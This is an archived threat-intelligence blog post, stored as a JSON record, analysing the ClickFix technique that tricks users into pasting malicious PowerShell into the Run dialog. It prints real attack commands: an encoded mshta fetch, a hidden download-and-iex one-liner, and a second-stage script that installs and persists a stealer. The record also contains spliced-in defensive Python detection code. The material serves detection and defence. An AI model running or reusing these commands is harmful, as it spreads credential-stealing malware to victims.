{
	"id": "42090076-25d9-47b6-879e-c716e15e6237",
	"created_at": "2026-05-05T02:45:20.579691Z",
	"updated_at": "2026-05-05T02:46:36.742553Z",
	"deleted_at": null,
	"sha1_hash": "81e679651910fcbd740f2571d11cb51ad7878686",
	"title": "ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7491535,
	"plain_text": "ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims\r\nArchived: 2026-05-05 02:15:17 UTC\r\nIntroduction\r\nSince August 2024, the Group-IB Threat Intelligence (TI) team has researched and actively monitored the ClickFix technique in the wild. The technique has gained significant traction and widespread adoption among threat actors because of its surprising effectiveness. It is tracked by cybersecurity researchers and firms under the names ClickFix and ClearFix.\r\nThe Group-IB TI team has analyzed various infection chains and variants of this technique, as well as the different operations that have employed it. Based on this analysis, we have developed detection signatures for identifying ClickFix websites in the wild. Our systems continue to detect and track numerous instances of these sites, with thousands already added to our database at the time of compiling this report.\r\nAt its core, the ClickFix infection chain works by deceiving users into taking an action to “fix” a non-existent issue: a malicious command is copied to the clipboard, either automatically or by the user, and then pasted into a terminal or the Run dialog. Pop-ups are shown with dialogs that require the user to click buttons such as “Fix It” or “I am not a robot”, to name just two of the observed lures. Once the button is clicked, a malicious PowerShell command is placed on the user’s clipboard. Users are then instructed to press Windows key + R and paste the command into the Run dialog, executing the malware without realizing it. The technique simplifies the infection process: the attacker deploys the malware with the direct help of the victim.\r\nWhen users click the button on these webpages, the malicious PowerShell command is copied to their clipboard and additional instructions are displayed to prompt execution. 
The website uses JavaScript to perform the copy, so the victim never has to select or copy anything themselves.\r\nNotably, the method capitalizes on human behavior: by presenting a plausible “solution” to a perceived problem, attackers shift the burden of execution onto the user, effectively sidestepping many automated defenses.\r\nThe technique has been adopted by many cybercriminals, and even by APT groups, to lure victims and infect them with the malware of their choice.\r\nThis blog post explores the ClickFix technique within the infostealer ecosystem, showcasing real-world examples. We highlight an incident detected by Group-IB MXDR before the technique became public and give examples of APT groups using ClickFix as well. We also offer recommendations for mitigating this threat, for organizations and for individuals.\r\nKey discoveries in the blog\r\nClickFix is a social engineering technique that tricks users into executing malicious PowerShell commands that are automatically copied to their clipboard.\r\nFirst observed in October 2023, with significant global adoption by late 2024.\r\nFake reCAPTCHA pages and bot protection prompts are the most common disguises.\r\nLumma is the most frequently distributed infostealer in the analyzed campaigns.\r\nNation-state-sponsored APT groups have also adopted the technique because of its effectiveness.\r\nClickFix and the Infostealer Ecosystem\r\nUnderstanding the mechanisms behind malware distribution is essential for identifying and disrupting potential threats before they materialize. The ClickFix technique emerged as a vector for delivering infostealer malware in late 2024. This section explores how threat actors use ClickFix to compromise their victims.\r\nInfostealer malware is designed to exfiltrate sensitive data from compromised devices. 
This includes a wide variety of information such as usernames, passwords, cookies, cryptocurrency wallet data, and other confidential documents. Infostealers, like any other type of malware, can be distributed in many ways, but ClickFix has recently become one of the most popular methods of tricking victims into installing them.\r\nHow the ClickFix trick works: ClickFix is a social engineering technique that tricks the victim into believing that a legitimate action is required to proceed. This often manifests as an “Update”, “Fix”, or “Bot verification” prompt that appears when the user interacts with the site. The victim follows the instructions in the prompt, which essentially amount to opening the Windows Run dialog and pressing Ctrl+V; this pastes the clipboard contents and causes the malicious code to execute on their machine. As a result, the malware payload is delivered and the victim’s machine is compromised.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 1 of 22\r\nFigure 1. ClickFix malware infection chain.\r\nWe have observed that the majority of campaigns aim to deliver infostealers, which, once installed, collect sensitive information from the victim’s system and send it back to the attacker behind the operation.\r\nKey methods employed by threat actors to drive traffic to ClickFix pages:\r\nDuring the analysis of ClickFix kill chains in the wild, the following methods were observed:\r\n1. Spearphishing and Social Engineering: Threat actors use spearphishing emails or messages (via chat apps or SMS) to lure users into clicking on malicious links. This can be done opportunistically or by engaging targets directly with a tailored social engineering scheme.\r\n2. 
Malicious Advertising (Malvertising): Ads on legitimate websites are hijacked to display malicious pop-ups or redirect users to phishing sites.\r\n3. Phishing Websites (SEO poisoning): Malicious sites that mimic legitimate services (e.g., video streaming or tools) are SEO-optimized to rank high in search results, attracting unsuspecting visitors.\r\n4. Compromised Legitimate Websites: Threat actors exploit vulnerable or poorly secured websites to inject malicious plugins or code, which then affects the visitors of those sites.\r\n5. Social Media Spam: Threat actors spam forums, social media platforms, and comment sections to promote fake opportunities that lead to malware.\r\nOnce victims land on the malicious page by any of the above methods, the ClickFix technique is used to trick them into executing the malicious payload, which is usually an infostealer.\r\nFigure 2. Malware lifecycle utilizing ClickFix for delivery.\r\nAn Early Incident Detected by Group-IB MXDR\r\nOverview\r\nIn August 2024, the Group-IB Incident Response team detected this technique being used in a campaign targeting Windows systems. The campaign used websites presenting fake reCAPTCHA forms to deceive users into executing a chain of obfuscated PowerShell commands, ending in a final downloader that deployed the LummaC2 infostealer (see Figure 3). Group-IB named this final downloader SMOKESABER.\r\nFigure 3. Overall chain of execution of the detected incident.\r\nIncident Details\r\nInitial Access\r\nThe attacker starts by constructing a malicious URL on a hijacked domain that leads the user to a fake reCAPTCHA page (see Figure 4). Once the user clicks the “I’m not a robot” button, the script embedded in the HTML page makes the browser copy a malicious PowerShell command to the user’s clipboard. 
A pop-up then instructs the user to open the Windows Run dialog and paste the command to execute it (see Figure 5).\r\nFigure 4. Fake reCAPTCHA page.\r\nFigure 5. Pop-up instructing the victim to run the malicious command.\r\nThe Base64-encoded PowerShell command runs mshta against a remote URL, which serves a portable executable carrying an HTA application that runs an obfuscated JavaScript loader.\r\nEncoded: powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQ\r\nDecoded (the -eC argument is Base64 of a UTF-16LE string): mshta “https://getyourpages.com/downloads/brv”\r\nJavaScript Loader\r\nThe initial access PowerShell command runs “C:\\Windows\\System32\\mshta.exe” to execute the JavaScript embedded in the HTA application (see Figure 6).\r\nFigure 6. First stage of the JavaScript loader.\r\nThe file handed to mshta is a Windows binary with the JS scripts appended as an overlay. Without the overlay, the file is a clean Windows binary. mshta looks for \u003cscript\u003e tags within the file and executes the embedded script, ignoring the binary portion. This lets attackers embed malicious scripts alongside the binary content of a clean executable and have mshta execute the script without raising suspicion.\r\nThe script starts by mapping decimal-encoded ASCII values to variables with randomized names. It then uses String.fromCharCode() to turn those values back into their corresponding ASCII characters, unraveling the second stage of the JavaScript loader (see Figure 7). Analysis of the second stage shows that variables such as hch and JKk contain obfuscated data that is decoded by the hsH function. 
The script uses the decoded variable JKk, which resolves to WScript.Shell, to create a new ActiveXObject. This object lets the script run commands with the privileges of the current user; it is used to execute the encoded command stored in hch, which resolves to SMOKESABER, the final PowerShell downloader (see Figure 8).\r\nFigure 7. Second stage of the JavaScript loader.\r\nFigure 8. SMOKESABER.\r\nSMOKESABER\r\nSMOKESABER employs several techniques to stay stealthy and deliver the final payload. It runs in a hidden window (-w 1) and bypasses the execution policy (-ep Unrestricted). The payload URL is obfuscated as an array of numeric values passed to the Yju() function, which subtracts 11 from each value and converts the result to its ASCII character to reveal the actual URL. SMOKESABER also checks whether a file named bravo.zip already exists in %TEMP%; if not, the script decodes the remote URL hosting the file, downloads it with a WebClient request to hxxps://getyourpages[.]com/downloads/bravo[.]zip, stores it in %TEMP%, uncompresses it, and executes the first file in the extracted folder, which is the executable containing the infostealer (see Figure 9).\r\nFigure 9. Deobfuscated SMOKESABER.\r\nNote: Group-IB used the following to decode the JavaScript loader and SMOKESABER.\r\nJavaScript Loader Stage 1\r\nJavaScript Loader Stage 2\r\nSMOKESABER\r\nFinal Stealer\r\nThe final payload delivered in bravo.zip was identified by Group-IB as the LummaC2 infostealer, delivered alongside the DLLs the malware needs (see Figure 10).\r\n
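To make the decoding steps concrete, the following Python is an added example written for this edit (not code from the Group-IB post or from the malware) that reverses each obfuscation layer described above: the -eC argument (Base64 of a UTF-16LE string), the script body that mshta pulls out of a PE overlay, the stage-1 String.fromCharCode() mapping, and the subtract-11 array used by SMOKESABER’s Yju(). The sample command, binary blob and array are constructed here, and example.test is a placeholder rather than a campaign domain. recover_url() goes beyond the post by trying every offset when the constant is not known.

```python
# Added example for this edit, not code from the Group-IB post or the malware
# authors: helpers that reverse each obfuscation layer of the chain described
# above. Every sample input is constructed here; example.test is a placeholder.
import base64


def decode_encoded_command(arg):
    # powershell.exe -eC takes Base64 of a UTF-16LE string. The argument is
    # often captured without its trailing '=' padding, so restore it first.
    padded = arg + '=' * (-len(arg) % 4)
    return base64.b64decode(padded).decode('utf-16-le')


def extract_overlay_scripts(blob):
    # mshta ignores the binary body and runs whatever <script> elements it
    # finds, so an HTA appended as a PE overlay behaves like a plain HTA.
    text = blob.decode('latin-1')
    scripts = []
    pos = 0
    while True:
        start = text.find('<script', pos)
        if start < 0:
            break
        body_start = text.find('>', start) + 1
        end = text.find('</script>', body_start)
        if end < 0:
            break
        scripts.append(text[body_start:end].strip())
        pos = end + len('</script>')
    return scripts


def from_char_codes(values, offset=0):
    # Stage 1 maps decimal values straight to characters (offset 0);
    # SMOKESABER's Yju() subtracts 11 from each value before the same step.
    return ''.join(chr(v - offset) for v in values)


def recover_url(values, max_offset=64):
    # Goes beyond the post: when the offset is unknown, try each candidate
    # and keep the first decoding that looks like a URL.
    for offset in range(max_offset + 1):
        try:
            candidate = from_char_codes(values, offset)
        except ValueError:
            continue
        if candidate.startswith(('http://', 'https://')):
            return offset, candidate
    return None


# Constructed samples (not real campaign artifacts).
SAMPLE_URL = 'https://example.test/downloads/bravo.zip'
SAMPLE_ENCODED = base64.b64encode(
    ('mshta ' + SAMPLE_URL).encode('utf-16-le')).decode('ascii').rstrip('=')
SAMPLE_BINARY = (b'MZ' + bytes(64)
                 + b'<html><script>var x = String.fromCharCode(104,105);</script></html>')
SAMPLE_STAGE2 = [ord(c) + 11 for c in SAMPLE_URL]   # what Yju() reverses

if __name__ == '__main__':
    print(decode_encoded_command(SAMPLE_ENCODED))
    print(extract_overlay_scripts(SAMPLE_BINARY))
    print(from_char_codes([104, 105]))
    print(recover_url(SAMPLE_STAGE2))
```

Running the file prints the decoded command, the extracted script, and the recovered URL with its offset. The overlay extraction is also why a hash-based block on the downloaded file is weak: the PE body can be any clean binary, so the script body is what to hash or scan.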
LummaC2 is a stealer written in C that has been sold as Malware-as-a-Service on Russian-language underground forums by the threat actor Shamel since December 2022. LummaC2 mainly targets cryptocurrency wallet and 2FA browser extensions, along with data from Chromium- and Mozilla-based browsers.\r\nFigure 10. Contents of bravo.zip.\r\nAnalysis of LummaC2 in the Group-IB Malware Detonation Platform (MDP) showed that the LummaC2 executable 0tagscan.exe injects into BitLockerToGo.exe, which then communicates with the infostealer C2 infrastructure.\r\nHighlights from the wild\r\nThe first detection of this technique was around 19 October 2023. At that point it was not as mature as the current variants, but it was likely the start of the technique’s evolution (see Figure 12). Disguised as Cloudflare anti-bot protection, it lured victims into copying and executing code to prove that they were not robots.\r\nFigure 12. Screenshot of a very early variant of the ClickFix technique.\r\nFast forward to late 2024: we have observed an increase in the number of domains hosting ClickFix pages since the technique became popular in August 2024. The figure below illustrates the rising trend of pages with ClickFix content from August 2024 to mid-February 2025.\r\nFigure 13. Chart showing the growing trend of ClickFix pages.\r\nThis trend suggests that the technique is gaining popularity because of its effectiveness in deceiving users and helping threat actors achieve their objectives, and it is expected to appear more frequently in the wild.\r\nThe rising prevalence of ClickFix pages underscores the growing threat posed by the technique, so effective methods for detecting and mitigating it become increasingly important. 
To keep pace with these evolving threats, we have developed hunting rules for ClickFix pages to track their spread across the threat landscape.\r\nHunting ClickFix Pages\r\nGroup-IB’s hunting strategy employs a multi-layered approach focused on identifying new domains hosting ClickFix content and analyzing the associated kill chains. This process combines automated tools with manual techniques to detect patterns characteristic of ClickFix pages, such as unique strings, page source components, domain names, JavaScript functions, and hashes of loaded content (e.g., scripts, images, etc.). Our hunting rules and internal tools have already detected thousands of ClickFix pages in the wild, and the numbers continue to rise. This lets us provide fresh IOCs and support organizations in strengthening their proactive defenses.\r\nNow let’s look at a simple way for analysts to hunt for HTML pages hosting a ClickFix variant that a security researcher developed for educational purposes; its source code is available on GitHub. By inspecting the page source (index.html), we can identify several key strings, including:\r\n“reCAPTCHA Verification ID” – This captures the reCAPTCHA element.\r\n“document.execCommand(“copy”)” – This captures the automatic copy-to-clipboard functionality.\r\nUsing just these two strings, we can run a query on URLScan.io to get a list of ClickFix pages:\r\nFigure 14. Query results from URLScan.\r\nEach variant in the wild has its own properties and unique strings in its page source, or it may load a specific image file or script; these can be used to build a similar query to find the malicious pages or to monitor for their appearance in real time.\r\nNext, we take a closer look at some of the most common ClickFix variants observed in the wild.\r\n
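As an added example (not code from the post or from the researcher’s GitHub project), the following Python applies the same string-based hunting to page sources saved locally, for instance from a crawler or from URLScan.io DOM snapshots. The indicator lists, the triage rule, and both sample pages are this example’s own constructions; example.test is a placeholder.

```python
# Added example for this edit, not code from the Group-IB post: a page-source
# scanner that applies the string-based hunting idea above to local copies of
# pages. Indicator lists are this example's own; sample pages are constructed.

# Ways a page can write to the clipboard without the user selecting text.
CLIPBOARD_INDICATORS = (
    'execcommand(',                    # legacy copy API used by the educational variant
    'navigator.clipboard.writetext',
    'clipboarddata.setdata',
)
# Lure text and the Win+R / Ctrl+V instructions shown to the victim.
LURE_INDICATORS = (
    'recaptcha verification id', 'i am not a robot', 'verify you are human',
    'fix it', 'win + r', 'windows + r', 'win+r', 'ctrl + v', 'ctrl+v',
)
# Fragments of the command that ends up on the clipboard.
COMMAND_INDICATORS = (
    'powershell', 'mshta', 'iex ', '-w hidden', 'invoke-webrequest', 'downloadstring',
)


def score_page(html):
    # Return every indicator found, matched case-insensitively.
    lower = html.lower()
    found = []
    for ind in CLIPBOARD_INDICATORS:
        idx = lower.find(ind)
        if idx < 0:
            continue
        # execCommand has other uses; only count it when 'copy' follows the call.
        if ind == 'execcommand(' and 'copy' not in lower[idx:idx + 30]:
            continue
        found.append(ind)
    for ind in LURE_INDICATORS + COMMAND_INDICATORS:
        if ind in lower:
            found.append(ind)
    return found


def is_clickfix_candidate(html):
    # Triage rule: a clipboard write plus either a command fragment or at least
    # two lure strings. Tune the thresholds against your own benign corpus.
    found = score_page(html)
    has_copy = any(f in CLIPBOARD_INDICATORS for f in found)
    has_cmd = any(f in COMMAND_INDICATORS for f in found)
    lure_hits = sum(1 for f in found if f in LURE_INDICATORS)
    return has_copy and (has_cmd or lure_hits >= 2)


def hunt(pages):
    # pages: mapping of name -> page source; returns the names worth a look.
    return [name for name, html in pages.items() if is_clickfix_candidate(html)]


# Constructed samples (not real pages).
CLICKFIX_SAMPLE = '''<div class='rc-anchor'>
<input type='checkbox' onclick='copyFix()'> I am not a robot
</div>
<div>reCAPTCHA Verification ID: 7f3a</div>
<div>1. Press Win + R  2. Press Ctrl + V  3. Press Enter</div>
<script>
function copyFix() {
  var ta = document.createElement('textarea');
  ta.value = 'powershell.exe -W Hidden -command iex (Invoke-WebRequest https://example.test/il2.txt -UseBasicParsing).Content';
  document.body.appendChild(ta);
  ta.select();
  document.execCommand('copy');
}
</script>'''

BENIGN_SAMPLE = '''<form action='/login'>
<div class='g-recaptcha' data-sitekey='sitekey-placeholder'></div>
<button>Sign in</button>
</form>
<script src='https://www.google.com/recaptcha/api.js'></script>'''

if __name__ == '__main__':
    print(hunt({'lure.html': CLICKFIX_SAMPLE, 'login.html': BENIGN_SAMPLE}))
```

The execCommand check requires the literal copy near the call because the same API also serves benign cut and paste; a clipboard write on its own is common on legitimate share buttons too, which is why the rule additionally wants a command fragment or two lure strings before it flags a page.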
These variants differ in style and implementation but share much at their core.\r\nThe fake reCAPTCHA\r\nThis variant closely mirrors the look and functionality of the legitimate Google reCAPTCHA, making it highly convincing to internet users. Its familiarity encourages unsuspecting victims to engage with the page, believing it to be part of a standard security check.\r\nBelow are some of the varying styles detected in the wild:\r\nFigure 15. Variants of the fake reCAPTCHA.\r\nImpersonating social media sites\r\nFigure 16. Impersonating social media sites.\r\nCloudflare bot protection on deceptive sites\r\nAnother variation of the ClickFix technique imitates Cloudflare bot protection. Several phishing sites have been identified that imitate well-known brand sites, only to redirect users to a ClickFix page. Examples are shown below:\r\nFigure 17. Examples of fake Cloudflare bot protection.\r\nThese ClickFix pages closely resemble the authentic Cloudflare page, but when the user attempts to verify, the following appears:\r\nFigure 18. Example of a secondary prompt for users to fix their browser.\r\nWhen the “Fix It” button is clicked, malicious code is copied to the user’s clipboard, and the next page shows:\r\nFigure 19. Example of a follow-up prompt for users to copy the malicious code to their clipboard.\r\nSome other styles:\r\nFigure 20. 
Another example of a follow-up prompt for users to copy the malicious code to their clipboard.\r\nProblems with the Browser\r\nPop-ups claim there are issues with the browser that require the user to take specific actions in order to resolve the problem and continue browsing normally.\r\nFigure 21. Pop-ups that require users to take specific actions to resolve their browser issues.\r\nImpersonating cryptocurrency trading sites\r\nFigure 22. Example of similar pop-ups on phishing sites impersonating cryptocurrency trading sites.\r\nImpersonating various brands\r\nFigure 22. Example of similar pop-ups on phishing sites impersonating the websites of popular brands.\r\nAll of them work in a similar manner: upon clicking “I’m not a robot”, “Fix it”, or “Copy Fix”, the malicious code is automatically copied to the clipboard and instructions are shown to paste it into the Run dialog.\r\nThe possibilities are endless, and the technique continues to evolve, finding new ways to deceive users. As threat actors refine their methods, we can expect even more sophisticated variants to emerge.\r\nLet’s now explore how threat actors have weaponized ClickFix and the distribution methods they use to lead victims to these malicious pages.\r\nAPT Groups using the fake reCAPTCHA\r\nNation-state sponsored APT groups have incorporated ClickFix into their toolkit. Group-IB has attributed one campaign with moderate confidence to MuddyWater. 
The group is suspected of launching a campaign targeting Armenian organizations by creating a phishing site that mimicked an Armenian police website (hxxps[://]police-am[.]info/news/view/galstanyan151026[.]html). They sent deceptive emails to victims, ultimately delivering a remote monitoring and management (RMM) tool that granted the attackers full access to the compromised systems. A screenshot of the website is included below.\r\nFigure 23. Examples of translated content for specific countries and regions.\r\nAs shown in the images above, the original variant was translated into the language of the targeted victims, highlighting how ClickFix variants are evolving and being tailored for specific audiences.\r\nAs highlighted in our annual High-Tech Crime Trends Report 2025, APT28 also used this tactic against the Ukrainian government, as reported by CERT-UA. The image below illustrates the kill chain from the phishing email to the reverse shell.\r\nFigure 23. Kill chain from phishing email to reverse shell, by CERT-UA.\r\nMalvertising\r\nAmong the ways ClickFix spreads in the wild is malvertising. We observed many seemingly innocuous sites offering content such as movies, free games, cracked software, and video downloaders that carried malicious ads which at some point started redirecting users to ClickFix pages, or showing pop-ups that opened a ClickFix page when clicked.\r\nThe figure below shows a user’s browsing history and how the user was redirected to the ClickFix page after visiting a site for downloading YouTube videos:\r\nFigure 24. 
Browser history and redirection.\r\nThe following is the malicious PowerShell command that is copied to the user’s clipboard on that page:\r\npowershell.exe -W Hidden -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text\r\nThis command downloads a second PowerShell script from https://finalstepgo.com/uploads/il2.txt and runs it with iex (Invoke-Expression):\r\n$DC9otj0V='https://finalstepgo.com/uploads/il222.zip';\r\n$Oo9IGFrX=$env:APPDATA+'\\OIlqJYuE';\r\n$jRAYnWOS=$env:APPDATA+'\\yANrdNKT.zip';\r\n$BtdSGfci=$Oo9IGFrX+'\\PrivacyDrive.exe';\r\nif (-not (teST-PatH $Oo9IGFrX)) { new-itEM -Path $Oo9IGFrX -ItemType Directory };\r\nSTart-biTSTrANSFeR -Source $DC9otj0V -Destination $jRAYnWOS;\r\nExPAnD-aRcHIVE -Path $jRAYnWOS -DestinationPath $Oo9IGFrX -Force;\r\nremOvE-ITem $jRAYnWOS;\r\nStarT-ProCESS $BtdSGfci;\r\nNEw-itemPrOPeRtY -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'RATU0Beb' -Value $BtdSGfci -PropertyType 'String';\r\nThe second stage creates a randomly named folder under %APPDATA%, fetches il222.zip with a BITS transfer, expands it, deletes the archive, starts PrivacyDrive.exe from the extracted folder, and registers that executable under the HKCU Run key so it starts at every logon. The mixed-case cmdlet names are a simple evasion for string matching; PowerShell resolves them case-insensitively. The chain eventually downloads and executes a file that is actually the Lumma infostealer (SHA1: 03ac191b235b3a867539720070a5e6ca1108b4f2).\r\nWe have identified other sites with similar behavior. What all of them have in common is that they provide illegal video/movie downloading or streaming services, and they were used as distribution infrastructure through the pop-ups that appear on them.\r\n
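As an added example written for this edit (not from the post and not a vendor rule), the following Python shows the host-side detection a SOC would pair with the page hunting: it flags script interpreters spawned directly under explorer.exe, which is where a command pasted into Win+R runs, and matches the command-line fragments seen in the scripts above, including inside a -eC Base64 argument. The event schema and all three events are constructed; example.test is a placeholder.

```python
# Added example for this edit, not code from the Group-IB post or any EDR vendor:
# detection logic for the execution side of ClickFix, run over constructed
# process-creation events. The field names are this example's own schema.
import base64

# Win+R launches its child directly under explorer.exe; a script interpreter
# appearing there is unusual for most users.
RUN_DIALOG_PARENTS = {'explorer.exe'}
INTERPRETERS = {'powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe'}
# Fragments seen in the command lines above and in the incident write-up.
SUSPICIOUS_TOKENS = (
    '-w hidden', '-ec ', '-encodedcommand', 'iex ', 'invoke-expression',
    'invoke-webrequest', 'downloadstring', 'mshta http', 'start-bitstransfer',
)


def decode_encoded_arg(cmdline):
    # Expand a -eC/-EncodedCommand argument (Base64 of UTF-16LE) so the tokens
    # hidden inside it can be matched as well. Returns '' when there is none.
    parts = cmdline.split()
    for i, part in enumerate(parts[:-1]):
        if part.lower() in ('-e', '-ec', '-enc', '-encodedcommand'):
            arg = parts[i + 1]
            try:
                padded = arg + '=' * (-len(arg) % 4)
                return base64.b64decode(padded).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return ''
    return ''


def classify(event):
    # Return the list of reasons an event is suspicious (empty if none).
    image = event['image'].lower()
    parent = event['parent'].lower()
    cmd = event['cmdline']
    text = (cmd + ' ' + decode_encoded_arg(cmd)).lower()
    reasons = []
    if image in INTERPRETERS and parent in RUN_DIALOG_PARENTS:
        reasons.append('interpreter launched from Run dialog (parent explorer.exe)')
    if image == 'mshta.exe' and 'http' in text:
        reasons.append('mshta fetching remote content')
    for tok in SUSPICIOUS_TOKENS:
        if tok in text:
            reasons.append('token:' + tok.strip())
    return reasons


def severity(event):
    # Run-dialog origin plus a suspicious token is the ClickFix signature.
    reasons = classify(event)
    if not reasons:
        return 'none'
    from_run = any(r.startswith('interpreter launched') for r in reasons)
    has_token = any(r.startswith('token:') or r.startswith('mshta') for r in reasons)
    if from_run and has_token:
        return 'high'
    return 'medium' if has_token else 'low'


def triage(events):
    # Return (severity, image, reasons) for each event that is not clean.
    return [(severity(e), e['image'], classify(e)) for e in events if severity(e) != 'none']


# Constructed events (not real telemetry); example.test is a placeholder.
SAMPLE_EVENTS = [
    # the malvertising variant above, as pasted into Win+R
    {'image': 'powershell.exe', 'parent': 'explorer.exe',
     'cmdline': '''powershell.exe -W Hidden -command $url = 'https://example.test/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text'''},
    # the MXDR incident shape: an encoded command that resolves to mshta plus a URL
    {'image': 'powershell.exe', 'parent': 'explorer.exe',
     'cmdline': 'powershell.exe -eC ' + base64.b64encode(
         'mshta https://example.test/downloads/brv'.encode('utf-16-le')).decode('ascii').rstrip('=')},
    # benign admin use: a scheduled script started by the task scheduler host
    {'image': 'powershell.exe', 'parent': 'svchost.exe',
     'cmdline': 'powershell.exe -File C:/Scripts/backup.ps1'},
]

if __name__ == '__main__':
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Benign administrative PowerShell usually arrives under svchost.exe (scheduled tasks), a management agent, or a console window rather than explorer.exe, so the parent-process condition carries most of the signal; where users legitimately launch PowerShell from Run, lean on the token matches and on the decoded -eC content instead. The same mshta-plus-URL condition is the one the firewall recommendation below turns into a block.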
Some of the sites observed serving these pop-ups are:\r\n*.savefrom.net\r\nunblocked.watch\r\nmp3fromlink.com\r\nhisotv.com\r\nwww.portalmovies.com.ar\r\nsfrom.net\r\ntagalogdubbed.com\r\nwww.youtubepp.com\r\nssyoutube.com\r\nwww.y2mate.com\r\nMulticanais.love\r\nAnother example from browser history shows redirects from a free movies site to many ClickFix pages with titles such as “..Loading..”, “Security Check”, and “Verify You Are Human”:\r\nFigure 24. Browser history after visiting a website with malicious ads redirecting to ClickFix pages.\r\nThis website, like many others, generates revenue through an ad network, where more ad redirects mean higher earnings. Visitors are forcibly redirected through hidden buttons on the page or by mapping the browser’s Back button to the redirect trigger. The ad network delivers malicious ads containing ClickFix content, and the parties serving these ads do not filter content, so anything can be advertised. These ads typically run on illegitimate websites that host pirated or free content. The source of the ads on this particular page was hxxps[://]nx[.]oribichitra[.]com/rBJF1ZzvNtU/LrNQV. Using an ad blocker provides good protection against these ad pop-ups and redirects.\r\nSpamming forums and social media with links to ClickFix\r\nAnother distribution method used by threat actors is spamming forums or social media with links to ClickFix pages. In the example below, the threat actor posted on a gaming forum about a crack for a popular new game:\r\nFigure 25. 
Example of a post offering a crack for a popular new game that leads to a ClickFix phishing page.\r\nSo, when users search the Internet for free or cracked versions of video games or software, they may encounter online forums, community posts, or public repositories with links that redirect them to ClickFix pages.\r\nPhishing emails\r\nAnother campaign that went viral targeted GitHub users: a threat actor creates a GitHub issue with phishing content claiming that the repository has vulnerabilities, as shown in the image below.\r\nGitHub then sends an email notification with the content of the issue to repository contributors; an example email is shown below.\r\nWhen the user opens the phishing link, the ClickFix page is displayed.\r\nSpearphishing emails with HTML attachments\r\nIn the example below, the threat actor sent a spearphishing email with an HTML attachment that was actually a ClickFix page.\r\nOpening the attachment shows the ClickFix page.\r\nContent injected into the clipboard:\r\nNote that in the Run dialog only the first line of the pasted content, ipconfig /flushdns, is visible, which makes it look harmless.\r\nFinal payload that is executed:\r\nThe final payload in this campaign was DarkGate malware.\r\nConclusion\r\nThe ClickFix technique marks an evolution in adversarial social engineering, leveraging user trust and browser functionality for malware deployment. The rapid adoption of this method by both cybercriminals and APT groups underscores its effectiveness and low technical barrier. 
By exploiting common workflows, such as interacting with CAPTCHAs or copying commands, these attacks have demonstrated an ability to bypass traditional defenses.\r\nOrganizations must adapt to this evolving threat by incorporating technical defenses such as PowerShell restrictions and clipboard activity monitoring while prioritizing user education. Combined, these measures can significantly diminish the risk posed by such attacks. As the landscape continues to evolve, proactive measures and vigilance are essential to mitigate the impact of these attack vectors.\r\nFor individuals, caution is equally important. Avoiding untrusted websites and prompts, using only reliable sources for downloads, and steering clear of unnecessary scripts or extensions can reduce exposure to these threats. Staying informed about cyber threats and verifying actions before executing them are essential practices that enhance personal security and complement broader technical defenses.\r\nRecommendations\r\nFor prevention:\r\nUsers should verify URLs in emails, especially those from unknown or unexpected sources.\r\nUsers should avoid downloading cracked software or illegal material and avoid visiting suspicious websites.\r\nUsers should not click on links from suspicious sources.\r\nUsers should adopt strong password practices: change passwords regularly, use unique and robust passwords for each online account that combine uppercase and lowercase letters, numbers, and symbols, and use 2FA wherever it is supported.\r\nUsers should not store passwords in web browsers, clear-text files, or Windows Credential Manager; use a password manager instead.\r\nOrganizations should implement advanced endpoint detection and response (EDR) solutions that use behavior-based detection to identify and block malicious activity. 
Ensure that AV and/or EDR sandbox executable files downloaded from the internet.\r\nOrganizations should implement MFA for access to sensitive systems and data.\r\nOrganizations should conduct regular training sessions to educate users about social engineering tactics and new phishing schemes.\r\nOrganizations should implement robust email filtering to block phishing emails and malicious attachments.\r\nOrganizations should apply a strict software execution policy to prevent users from running malware disguised as fake software installers.\r\nOrganizations should implement application whitelisting solutions so that only legitimate applications or scripts can run via the mshta.exe process.\r\nOrganizations should deploy a Group Policy firewall rule across all endpoints that blocks outbound connections over ports 443 and 80 from the mshta.exe process (after confirming that no legitimate business process relies on mshta.exe making network connections over those ports).\r\nOrganizations should block IOCs shared by threat intelligence service providers.\r\nIf prevention fails, a compromise often leads to the collection and exfiltration of sensitive information from the infected host. In that case, our recommendations are:\r\nImmediately isolate the infected machine and disconnect it from the internet.\r\nReset all passwords, invalidate session cookies, block payment cards, and so on, 
assuming that all sensitive data on the host, including files, has been compromised.\r\nEngage a DFIR team to assess the breach and conduct any necessary incident response activities.\r\nSource: https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/"
	],
	"report_names": [
		"clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims"
	],
	"threat_actors": [],
	"ts_created_at": 1777949120,
	"ts_updated_at": 1777949196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81e679651910fcbd740f2571d11cb51ad7878686.pdf",
		"text": "https://archive.orkl.eu/81e679651910fcbd740f2571d11cb51ad7878686.txt",
		"img": "https://archive.orkl.eu/81e679651910fcbd740f2571d11cb51ad7878686.jpg"
	}
}